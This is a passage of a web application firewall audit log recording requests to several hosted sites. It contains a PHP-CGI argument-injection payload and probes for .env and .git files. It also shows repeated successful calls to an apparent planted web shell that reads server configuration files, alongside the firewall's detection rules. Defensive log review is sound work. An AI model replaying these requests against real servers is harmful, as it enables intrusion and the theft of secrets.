"/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/119"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0mBwcFb_n1P0IC9xuxAAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103192876573 4655 (- - -) Stopwatch2: 1750103192876573 4655; combined=2544, p1=364, p2=2054, p3=41, p4=29, p5=56, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f111b673-Z-- --573a9b2e-A-- [17/Jun/2025:01:16:54.253679 +0530] aFB0rsl682-knofG8qdaMQAAAAM 216.73.216.71 40408 127.0.0.1 7081 --573a9b2e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fapache2%2Fports.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --573a9b2e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3181 Connection: close Content-Type: text/html; charset=UTF-8 --573a9b2e-H-- Message: Warning. Matched phrase "etc/apache2/ports.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/ports.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/ports.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/ports.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/ports.conf found within ARGS:viewfile: /proc/self/root/etc/apache2/ports.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0rsl682-knofG8qdaMQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103214249663 4071 (- - -) Stopwatch2: 1750103214249663 4071; combined=2221, p1=388, p2=1705, p3=36, p4=34, p5=58, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --573a9b2e-Z-- --ae200928-A-- [17/Jun/2025:01:17:00.558193 +0530] aFB0tKC450Yw050Ymr3_cQAAAAk 98.83.10.183 53382 127.0.0.1 7081 --ae200928-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/107 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.83.10.183 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --ae200928-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --ae200928-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/107"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/107"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB0tKC450Yw050Ymr3_cQAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103220554263 3980 (- - -) Stopwatch2: 1750103220554263 3980; combined=2023, p1=345, p2=1567, p3=36, p4=24, p5=50, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ae200928-Z-- --001dd144-A-- [17/Jun/2025:01:18:02.577138 +0530] aFB08pVkCcfT-Z8NQYyeXQAAAAc 216.73.216.71 57408 127.0.0.1 7081 --001dd144-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2F2599%2Fetc%2Fsecurity%2Fgroup.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --001dd144-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4610 Connection: close Content-Type: text/html; charset=UTF-8 --001dd144-H-- Message: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /snap/core20/2599/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/group" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/group found within ARGS:viewfile: /snap/core20/2599/etc/security/group.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB08pVkCcfT-Z8NQYyeXQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103282572944 4249 (- - -) Stopwatch2: 1750103282572944 4249; combined=2211, p1=437, p2=1644, p3=35, p4=35, p5=60, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --001dd144-Z-- --fecf3857-A-- [17/Jun/2025:01:18:25.467217 +0530] aFB1CRwcFb_n1P0IC9xvCgAAAAo 52.23.112.144 52826 127.0.0.1 7081 --fecf3857-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/13 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.23.112.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --fecf3857-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --fecf3857-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/13"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/13"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB1CRwcFb_n1P0IC9xvCgAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750103305462875 4393 (- - -) Stopwatch2: 1750103305462875 4393; combined=2308, p1=361, p2=1823, p3=38, p4=29, p5=57, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fecf3857-Z-- --57d2da63-A-- [17/Jun/2025:01:25:37.580634 +0530] aFB2uFJfblPUQiSn5r1skwAAAAA 164.90.228.79 34748 127.0.0.1 7081 --57d2da63-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 164.90.228.79 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --57d2da63-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --57d2da63-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||archangledesignstudio.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||archangledesignstudio.com|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "archangledesignstudio.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aFB2uFJfblPUQiSn5r1skwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750103736246378 1334333 (- - -) Stopwatch2: 1750103736246378 1334333; combined=159400, p1=472, p2=4331, p3=0, p4=0, p5=77374, sr=119, sw=1, l=0, gc=77222 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --57d2da63-Z-- --2e165741-A-- [17/Jun/2025:01:25:53.519209 +0530] aFB2yH3hoSwVUy254pH_TQAAACQ 164.90.228.79 38548 127.0.0.1 7081 --2e165741-B-- GET /.env HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 164.90.228.79 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --2e165741-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --2e165741-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "archangledesignstudio.com"] [uri "/.env"] [unique_id "aFB2yH3hoSwVUy254pH_TQAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750103752167561 1351727 (- - -) Stopwatch2: 1750103752167561 1351727; combined=1616, p1=278, p2=1210, p3=0, p4=0, p5=127, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2e165741-Z-- --8d2b784b-A-- [17/Jun/2025:01:25:55.060804 +0530] aFB2yZVkCcfT-Z8NQYyfqQAAAAc 164.90.228.79 38592 127.0.0.1 7081 --8d2b784b-B-- GET /.git/config HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 164.90.228.79 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --8d2b784b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://archangledesignstudio.com/wp-json/>; rel="https://api.w.org/" Vary: User-Agent Connection: close Content-Type: text/html; charset=UTF-8 --8d2b784b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "archangledesignstudio.com"] [uri "/.git/config"] [unique_id "aFB2yZVkCcfT-Z8NQYyfqQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750103753767373 1293528 (- - -) Stopwatch2: 1750103753767373 1293528; combined=1941, p1=421, p2=1425, p3=0, p4=0, p5=95, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d2b784b-Z-- --6c8cf52c-A-- [17/Jun/2025:01:28:58.508503 +0530] aFB3gcl682-knofG8qdcPwAAAAM 157.49.56.93 54948 127.0.0.1 7081 --6c8cf52c-B-- GET /wp-json/wp/v2/users/1 HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 157.49.56.93 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko --6c8cf52c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --6c8cf52c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tandonamit.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tandonamit.com"] [uri "/wp-json/wp/v2/users/1"] [unique_id "aFB3gcl682-knofG8qdcPwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750103937005355 1503224 (- - -) Stopwatch2: 1750103937005355 1503224; combined=1694, p1=320, p2=1259, p3=0, p4=0, p5=115, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c8cf52c-Z-- --913ae970-A-- [17/Jun/2025:01:30:37.443835 +0530] aFB35VJfblPUQiSn5r1tZAAAAAA 52.54.249.218 59204 127.0.0.1 7081 --913ae970-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/apache2/sites-enabled&viewfile=//etc/apache2/sites-enabled/000-default.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.54.249.218 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --913ae970-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3699 Connection: close Content-Type: text/html; charset=UTF-8 --913ae970-H-- Message: Warning. Matched phrase "etc/apache2/sites-enabled/000-default" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/sites-enabled/000-default found within ARGS:viewfile: /etc/apache2/sites-enabled/000-default.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/apache2/sites-enabled/000-default" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/apache2/sites-enabled/000-default found within ARGS:viewfile: /etc/apache2/sites-enabled/000-default.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB35VJfblPUQiSn5r1tZAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750104037436288 7601 (- - -) Stopwatch2: 1750104037436288 7601; combined=3010, p1=327, p2=2547, p3=44, p4=36, p5=56, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --913ae970-Z-- --e70a4f7e-A-- [17/Jun/2025:01:31:03.730633 +0530] aFB3_xwcFb_n1P0IC9xxMgAAAAo 91.122.53.173 47998 127.0.0.1 7081 --e70a4f7e-B-- GET /.git/HEAD HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 91.122.53.173 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: identity User-Agent: Python-urllib/3.13 --e70a4f7e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --e70a4f7e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.git/HEAD"] [unique_id "aFB3_xwcFb_n1P0IC9xxMgAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750104063051035 679655 (- - -) Stopwatch2: 1750104063051035 679655; combined=1772, p1=404, p2=1250, p3=0, p4=0, p5=118, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e70a4f7e-Z-- --5d710917-A-- [17/Jun/2025:01:33:14.544001 +0530] aFB4gpVkCcfT-Z8NQYyg8AAAAAc 196.251.85.66 57758 127.0.0.1 7080 --5d710917-B-- GET /public/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 196.251.85.66 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 Accept-Encoding: gzip --5d710917-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d710917-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/public/.env"] [unique_id "aFB4gpVkCcfT-Z8NQYyg8AAAAAc"] Stopwatch: 1750104194541175 2872 (- - -) Stopwatch2: 1750104194541175 2872; combined=1679, p1=371, p2=1214, p3=18, p4=23, p5=53, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d710917-Z-- --e0048959-A-- [17/Jun/2025:01:36:13.290894 +0530] aFB5NZVkCcfT-Z8NQYyhmQAAAAc 3.215.59.93 41268 127.0.0.1 7081 --e0048959-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/ufw/applications.d&viewfile=//etc/ufw/applications.d/apache2-utils.ufw.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.215.59.93 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e0048959-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3097 Connection: close Content-Type: text/html; charset=UTF-8 --e0048959-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/ufw/applications.d/apache2-utils.ufw.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /etc/ufw/applications.d/apache2-utils.ufw.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFB5NZVkCcfT-Z8NQYyhmQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750104373286571 4376 (- - -) Stopwatch2: 1750104373286571 4376; combined=2167, p1=353, p2=1679, p3=38, p4=35, p5=62, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e0048959-Z-- --739d0662-A-- [17/Jun/2025:01:38:23.820861 +0530] aFB5t33hoSwVUy254pEBxgAAACQ 52.169.46.19 54408 127.0.0.1 7081 --739d0662-B-- GET /hitech-news.com HTTP/1.0 Host: www.medikonindia.com X-Real-IP: 52.169.46.19 X-Accel-Internal: /internal-nginx-static-location Connection: close --739d0662-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.3.22 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html; charset=UTF-8 --739d0662-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.medikonindia.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.medikonindia.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.medikonindia.com"] [uri "/hitech-news.com"] [unique_id "aFB5t33hoSwVUy254pEBxgAAACQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/medikonindia.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750104503576241 244673 (- - -) Stopwatch2: 1750104503576241 244673; combined=1827, p1=333, p2=1392, p3=0, p4=0, p5=101, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --739d0662-Z-- --e2da8b68-A-- [17/Jun/2025:01:43:07.007438 +0530] 